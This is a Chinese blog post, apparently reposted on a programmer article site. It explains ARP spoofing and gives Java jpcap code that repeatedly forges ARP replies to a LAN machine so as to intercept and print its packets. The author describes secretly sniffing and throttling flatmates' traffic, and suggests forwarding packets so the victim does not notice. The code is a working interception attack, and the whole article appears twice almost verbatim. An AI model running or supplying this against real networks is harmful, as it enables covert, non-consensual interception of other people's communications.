使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听
程序员文章站
2023-12-03 14:03:58
如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些p2p工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说...
如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些p2p工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说,那简直就是痛不欲生。绝对不能再忍了,于是乎上网下载p2p终结者,哼,你们不仁我则不义,看谁厉害。软件下好后,立刻启动监控,然后尝试了下速度,哇,那个爽啊。可惜好景不长,没多久对方就跑来问我为什么他们断网了?我楞了一下,那垃圾软件居然连对方的网都断了,于是支支唔唔的应付了他,说我看下,总算勉强过关,还好他们不懂电脑,不然就掉大了(貌视挺卑鄙的,别bs俺,俺也是迫不得已)。
没办法,那破烂软件居然连人家网都断了,我仅仅只是想给他们限速而已(还算有点良心),仔细查看了下文档,使用的方式都没问题啊,为什么会这样呢?想了半天也毫无头绪,没办法,看来只能自己动手了,于是乎上网找了些关于这方面的资料看了下,也写了一点代码做试验,由于时间有限也只写了一点,不过总体的做法大概是有所了解,在这里就写一篇文章大概记录一下自己的做法,以便作为日记又可与大众分享下。
其实目前网络上类似p2p终结者这类软件,主要都是基于arp欺骗实现的,网络上到处都有关于arp欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下。
arp(address resolution protocol)既地址解释协议,主要的目的是用于进行ip和mac地址解释的。ip是网络层协议,而mac是被数据链路层使用。网络中两个节点要进行通信,那么首先发送端必须要知道源和目的地的mac地址,而网络层是使用ip地址,所以要获得mac地址,就必须通过ip地址获取对应的mac地址,这样就需要使用arp协议将ip地址转换为mac地址,而同时为了能够快速的找到目的地的mac地址,每个节点都会有一个arp缓存,用于保存已经转好好的mac地址,大家可以在控制台下使用arp –a指令查看arp缓存表。
而arp具体过程就是当需要通过ip获取一个远端的的mac地址的时候,系统会首先检查arp表中是否存在对应的ip地址,如果没有,则发送一个arp广播,当某一个拥有这个mac地址的节点收到arp请求的时候,会创建一个arp reply包,并发送到arp请求的源节点,arp reply包中就包含了目的地节点的mac地址,在源节点接受到这个reply后,会将目的地节点的mac地址保存在arp缓存表中,下一次再次请求同一ip地址的时候,系统将会从arp表中直接获取目的地mac地址,而不需要再次发送arp广播。
看到这里,arp的具体过程大概讲解了一遍,希望能够解释清楚。相信有心的朋友一定已经开始考虑arp欺骗的原理了吧,其实就是利用arp表进行arp欺骗,比如一台局域网内的机器a,通过网关b进行internet连接,而它的arp表中保存着网关b的ip和mac地址对,如下:
192.168.1.1 —> mac1(懒得写那么长了,就以mac1作为mac地址了)
那么也就是说,当a想上网的时候,他所有的数据都将先发送到网关再由网关转发出去,那么a的数据首先会通过192.168.1.1找到网关的mac地址mac1,然后就可把数据发送到网关了。此时你的机器是c,mac地址是mac2,你想通过arp欺骗来获取a传输的数据,那么你所需要做的事情其实很简单,就是将机器a的arp表中192.168.1.1对应的mac地址mac1改成mac2即可,这样子机器a所有发送到192.168.1.1的数据就会发到mac地址为mac2的机器上,也就是你的机器上了。
要更改apr表的记录,办法就是伪造一个arp reply包发送给机器a,而这个arp reply包中的源ip为192.168.1.1,mac地址为mac2既你的机器的mac地址即可,机器a接受到后就会将这个源ip和mac刷新到它的arp缓存表中,覆盖原有的记录,最终这样就可以达到arp欺骗的目的了。
讲到这里不知道大家是否对arp欺骗有所了解呢?如果再不了解那就上网搜搜吧,网上很多相关的资料。好了,原理讲完了,那就轮到实现了,通过java又如何实现arp欺骗呢?
从头到尾来做,当然不是我的作风,java社区那么庞大,我么应该好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一个开源项目jpcap,这个项目提供一个中间层接口让使用者可以调用如wincap/libpcap这些库对网络传输进行控制,具体可到官方网站查看其文档。
在这里,我实现了一个简单的封包截取程序,根据arp欺骗的原理,我们所需要做的事情如下:
1、构建一个arp reply包
2、将该封包发送到需要欺骗的机器
代码如下:
public class locallistener {
private final static string gate_ip = "192.168.11.1";
private final static byte[] gate_mac = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a};
private jpcapcaptor jpcap; //与设备的连接
private jpcapsender sender; //用于发送的实例
private packet replypacket; //arp reply包
private networkinterface device; //当前机器网卡设备
private ipmacmap targetipmacmap; //目的地ip mac对
public locallistener(ipmacmap target) throws exception {
networkinterface[] devices = jpcapcaptor.getdevicelist(); device = devices[1];
this.targetipmacmap = target;
initsender();
initpacket();
}
private void initsender() throws exception {
jpcap = jpcapcaptor.opendevice(device, 2000, false, 10000); //打开与设备的连接
jpcap.setfilter("ip", true); //只监听ip数据包
sender = jpcap.getjpcapsenderinstance();
}
private void initpacket() throws exception {
//reply包的源ip和mac地址,此ip-mac对将会被映射到arp表
ipmacmap targetssd = new ipmacmap(gate_ip, device.mac_address);
//创建修改目标机器arp的包
replypacket = arppacketgern.genpacket(targetipmacmap, targetssd);
//创建以太网头信息,并打包进reply包
replypacket.datalink = ethernetpacketgern.genpacket(targetipmacmap.getmac(),
device.mac_address);
}
public void listen() throws interruptedexception{
thread t = new thread(new runnable() {
public void run() {
//发送reply封包,修改目的地arp表, arp表会在一段时间内被更新,所以需要不停发送
while(true){
send();
try {
thread.sleep(500);
} catch (interruptedexception ex) {
logger.getlogger(locallistener.class.getname()).log(level.severe, null, ex);
}
}
}
});
t.start();
//截获当前网络设备的封包收发信息
while(true){
ippacket ippacket = (ippacket)jpcap.getpacket();
system.out.println(ippacket);
}
}}
//ip-mac实体,只用于保存一对ip-mac地址
public class ipmacmap {
private string ip;
private byte[] mac;
public ipmacmap(){
}
public ipmacmap(string ip, byte[] mac){
this.ip = ip;
this.mac = mac;
}
public string getip() {
return ip;
}
public void setip(string ip) {
this.ip = ip;
}
public byte[] getmac() {
return mac;
}
public void setmac(byte[] mac) {
this.mac = mac;
}
}
//arp reply包生成类,用于根据目的地址和源地址生成reply包
public class arppacketgern{
public static arppacket genpacket(ipmacmap target, ipmacmap sender) throws exception{
arppacket arptarget = new arppacket();
arptarget.hardtype = arppacket.hardtype_ether; //选择以太网类型(ethernet)
arptarget.prototype = arppacket.prototype_ip; //选择ip网络协议类型
arptarget.operation = arppacket.arp_reply; //选择reply类型
arptarget.hlen = 6; //mac地址长度固定6个字节
arptarget.plen = 4; //ip地址长度固定4个字节
arptarget.target_hardaddr = target.getmac();
arptarget.target_protoaddr = inetaddress.getbyname(target.getip()).getaddress();
arptarget.sender_hardaddr = sender.getmac();
arptarget.sender_protoaddr = inetaddress.getbyname(sender.getip()).getaddress();
return arptarget;
}
}
//根据目的地mac和源mac构建以太网头信息,用于传输数据
public class ethernetpacketgern{
public static ethernetpacket genpacket(byte[] targetmac, byte[] sendermac) throws exception {
ethernetpacket ethtotarget = new ethernetpacket(); //创建一个以太网头
ethtotarget.frametype = ethernetpacket.ethertype_arp; //选择以太包类型
ethtotarget.dst_mac = targetmac;
ethtotarget.src_mac = sendermac;
return ethtotarget;
}
}
如上代码实现了创建一个发送到ip为192.168.11.4的机器的arp reply封包,其中可看到,reply包中的源ip为192.168.11.1,而源mac则被改成当前机器的mac地址,既device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新arp表,并且所有发送往192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中创建了一个线程用于循环发送reply封包,主要是因为arp表会在一定时间内更新,所以要不停的发送才能保证其mac地址时刻都是被改变的。同时主线程用于监听并打印当前设备的所有ip数据包信息,本来此方法只能监听到本机数据包的信息,但由于使用了arp欺骗,所以你会在192.168.11.4发送数据到192.168.11.1的时候截获其数据包,并看到类似如下的信息:
1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) tcp 1337 > 8016 seq(1062321893) win(65535) s
其实上例程序虽然可以截获并监听192.168.11.4的数据包,但是如果真的运行起来后,192.168.11.4的机器将会无法上网(假设该机器通过192.168.11.1作为网关上网),这又是为何呢?
这就是因为本机截获了192.168.11.4的封包,但是却没有将封包转发出去,所以实际上数据包到了你的机器上后就被中断了,数据包无法发送出去。既然要监听对方机器,当然不能让对方知道啦,如果你监听了那台机器,却导致对方无法上网,*也知道有问题啦,所以以上程序仍然要加个补充,那就是将封包数据在转发到192.168.11.1上,只要将截获的封包再send出去就可以了,具体如何做就留给大家想吧,困了,休息了,如果有朋友有兴趣又实在想不出如何做的话,可以向我提出来,有必要的话,下次再贴一个完整点的例子吧。
对了,最后还有补充的地方,那就是我们可以通过同样的方式刷新网关的arp,这样网关接受到的数据也会被本机截获,同样再通过本机转发到目的机器即可。这样对方既可正常上网,而我们又可截获对方的数据包,如果要进行限速的话,那就是在截获封包的同时,进行一定的延时,比如一秒只允许多少k的数据通过,都可以在这里做手脚,同样的,具体如何留给大家想吧,^ o ^。
没办法,那破烂软件居然连人家网都断了,我仅仅只是想给他们限速而已(还算有点良心),仔细查看了下文档,使用的方式都没问题啊,为什么会这样呢?想了半天也毫无头绪,没办法,看来只能自己动手了,于是乎上网找了些关于这方面的资料看了下,也写了一点代码做试验,由于时间有限也只写了一点,不过总体的做法大概是有所了解,在这里就写一篇文章大概记录一下自己的做法,以便作为日记又可与大众分享下。
其实目前网络上类似p2p终结者这类软件,主要都是基于arp欺骗实现的,网络上到处都有关于arp欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下。
arp(address resolution protocol)既地址解释协议,主要的目的是用于进行ip和mac地址解释的。ip是网络层协议,而mac是被数据链路层使用。网络中两个节点要进行通信,那么首先发送端必须要知道源和目的地的mac地址,而网络层是使用ip地址,所以要获得mac地址,就必须通过ip地址获取对应的mac地址,这样就需要使用arp协议将ip地址转换为mac地址,而同时为了能够快速的找到目的地的mac地址,每个节点都会有一个arp缓存,用于保存已经转好好的mac地址,大家可以在控制台下使用arp –a指令查看arp缓存表。
而arp具体过程就是当需要通过ip获取一个远端的的mac地址的时候,系统会首先检查arp表中是否存在对应的ip地址,如果没有,则发送一个arp广播,当某一个拥有这个mac地址的节点收到arp请求的时候,会创建一个arp reply包,并发送到arp请求的源节点,arp reply包中就包含了目的地节点的mac地址,在源节点接受到这个reply后,会将目的地节点的mac地址保存在arp缓存表中,下一次再次请求同一ip地址的时候,系统将会从arp表中直接获取目的地mac地址,而不需要再次发送arp广播。
看到这里,arp的具体过程大概讲解了一遍,希望能够解释清楚。相信有心的朋友一定已经开始考虑arp欺骗的原理了吧,其实就是利用arp表进行arp欺骗,比如一台局域网内的机器a,通过网关b进行internet连接,而它的arp表中保存着网关b的ip和mac地址对,如下:
192.168.1.1 —> mac1(懒得写那么长了,就以mac1作为mac地址了)
那么也就是说,当a想上网的时候,他所有的数据都将先发送到网关再由网关转发出去,那么a的数据首先会通过192.168.1.1找到网关的mac地址mac1,然后就可把数据发送到网关了。此时你的机器是c,mac地址是mac2,你想通过arp欺骗来获取a传输的数据,那么你所需要做的事情其实很简单,就是将机器a的arp表中192.168.1.1对应的mac地址mac1改成mac2即可,这样子机器a所有发送到192.168.1.1的数据就会发到mac地址为mac2的机器上,也就是你的机器上了。
要更改apr表的记录,办法就是伪造一个arp reply包发送给机器a,而这个arp reply包中的源ip为192.168.1.1,mac地址为mac2既你的机器的mac地址即可,机器a接受到后就会将这个源ip和mac刷新到它的arp缓存表中,覆盖原有的记录,最终这样就可以达到arp欺骗的目的了。
讲到这里不知道大家是否对arp欺骗有所了解呢?如果再不了解那就上网搜搜吧,网上很多相关的资料。好了,原理讲完了,那就轮到实现了,通过java又如何实现arp欺骗呢?
从头到尾来做,当然不是我的作风,java社区那么庞大,我么应该好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一个开源项目jpcap,这个项目提供一个中间层接口让使用者可以调用如wincap/libpcap这些库对网络传输进行控制,具体可到官方网站查看其文档。
在这里,我实现了一个简单的封包截取程序,根据arp欺骗的原理,我们所需要做的事情如下:
1、构建一个arp reply包
2、将该封包发送到需要欺骗的机器
代码如下:
复制代码 代码如下:
public class locallistener {
private final static string gate_ip = "192.168.11.1";
private final static byte[] gate_mac = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a};
private jpcapcaptor jpcap; //与设备的连接
private jpcapsender sender; //用于发送的实例
private packet replypacket; //arp reply包
private networkinterface device; //当前机器网卡设备
private ipmacmap targetipmacmap; //目的地ip mac对
public locallistener(ipmacmap target) throws exception {
networkinterface[] devices = jpcapcaptor.getdevicelist(); device = devices[1];
this.targetipmacmap = target;
initsender();
initpacket();
}
private void initsender() throws exception {
jpcap = jpcapcaptor.opendevice(device, 2000, false, 10000); //打开与设备的连接
jpcap.setfilter("ip", true); //只监听ip数据包
sender = jpcap.getjpcapsenderinstance();
}
private void initpacket() throws exception {
//reply包的源ip和mac地址,此ip-mac对将会被映射到arp表
ipmacmap targetssd = new ipmacmap(gate_ip, device.mac_address);
//创建修改目标机器arp的包
replypacket = arppacketgern.genpacket(targetipmacmap, targetssd);
//创建以太网头信息,并打包进reply包
replypacket.datalink = ethernetpacketgern.genpacket(targetipmacmap.getmac(),
device.mac_address);
}
public void listen() throws interruptedexception{
thread t = new thread(new runnable() {
public void run() {
//发送reply封包,修改目的地arp表, arp表会在一段时间内被更新,所以需要不停发送
while(true){
send();
try {
thread.sleep(500);
} catch (interruptedexception ex) {
logger.getlogger(locallistener.class.getname()).log(level.severe, null, ex);
}
}
}
});
t.start();
//截获当前网络设备的封包收发信息
while(true){
ippacket ippacket = (ippacket)jpcap.getpacket();
system.out.println(ippacket);
}
}}
//ip-mac实体,只用于保存一对ip-mac地址
public class ipmacmap {
private string ip;
private byte[] mac;
public ipmacmap(){
}
public ipmacmap(string ip, byte[] mac){
this.ip = ip;
this.mac = mac;
}
public string getip() {
return ip;
}
public void setip(string ip) {
this.ip = ip;
}
public byte[] getmac() {
return mac;
}
public void setmac(byte[] mac) {
this.mac = mac;
}
}
//arp reply包生成类,用于根据目的地址和源地址生成reply包
public class arppacketgern{
public static arppacket genpacket(ipmacmap target, ipmacmap sender) throws exception{
arppacket arptarget = new arppacket();
arptarget.hardtype = arppacket.hardtype_ether; //选择以太网类型(ethernet)
arptarget.prototype = arppacket.prototype_ip; //选择ip网络协议类型
arptarget.operation = arppacket.arp_reply; //选择reply类型
arptarget.hlen = 6; //mac地址长度固定6个字节
arptarget.plen = 4; //ip地址长度固定4个字节
arptarget.target_hardaddr = target.getmac();
arptarget.target_protoaddr = inetaddress.getbyname(target.getip()).getaddress();
arptarget.sender_hardaddr = sender.getmac();
arptarget.sender_protoaddr = inetaddress.getbyname(sender.getip()).getaddress();
return arptarget;
}
}
//根据目的地mac和源mac构建以太网头信息,用于传输数据
public class ethernetpacketgern{
public static ethernetpacket genpacket(byte[] targetmac, byte[] sendermac) throws exception {
ethernetpacket ethtotarget = new ethernetpacket(); //创建一个以太网头
ethtotarget.frametype = ethernetpacket.ethertype_arp; //选择以太包类型
ethtotarget.dst_mac = targetmac;
ethtotarget.src_mac = sendermac;
return ethtotarget;
}
}
如上代码实现了创建一个发送到ip为192.168.11.4的机器的arp reply封包,其中可看到,reply包中的源ip为192.168.11.1,而源mac则被改成当前机器的mac地址,既device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新arp表,并且所有发送往192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中创建了一个线程用于循环发送reply封包,主要是因为arp表会在一定时间内更新,所以要不停的发送才能保证其mac地址时刻都是被改变的。同时主线程用于监听并打印当前设备的所有ip数据包信息,本来此方法只能监听到本机数据包的信息,但由于使用了arp欺骗,所以你会在192.168.11.4发送数据到192.168.11.1的时候截获其数据包,并看到类似如下的信息:
1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) tcp 1337 > 8016 seq(1062321893) win(65535) s
其实上例程序虽然可以截获并监听192.168.11.4的数据包,但是如果真的运行起来后,192.168.11.4的机器将会无法上网(假设该机器通过192.168.11.1作为网关上网),这又是为何呢?
这就是因为本机截获了192.168.11.4的封包,但是却没有将封包转发出去,所以实际上数据包到了你的机器上后就被中断了,数据包无法发送出去。既然要监听对方机器,当然不能让对方知道啦,如果你监听了那台机器,却导致对方无法上网,*也知道有问题啦,所以以上程序仍然要加个补充,那就是将封包数据在转发到192.168.11.1上,只要将截获的封包再send出去就可以了,具体如何做就留给大家想吧,困了,休息了,如果有朋友有兴趣又实在想不出如何做的话,可以向我提出来,有必要的话,下次再贴一个完整点的例子吧。
对了,最后还有补充的地方,那就是我们可以通过同样的方式刷新网关的arp,这样网关接受到的数据也会被本机截获,同样再通过本机转发到目的机器即可。这样对方既可正常上网,而我们又可截获对方的数据包,如果要进行限速的话,那就是在截获封包的同时,进行一定的延时,比如一秒只允许多少k的数据通过,都可以在这里做手脚,同样的,具体如何留给大家想吧,^ o ^。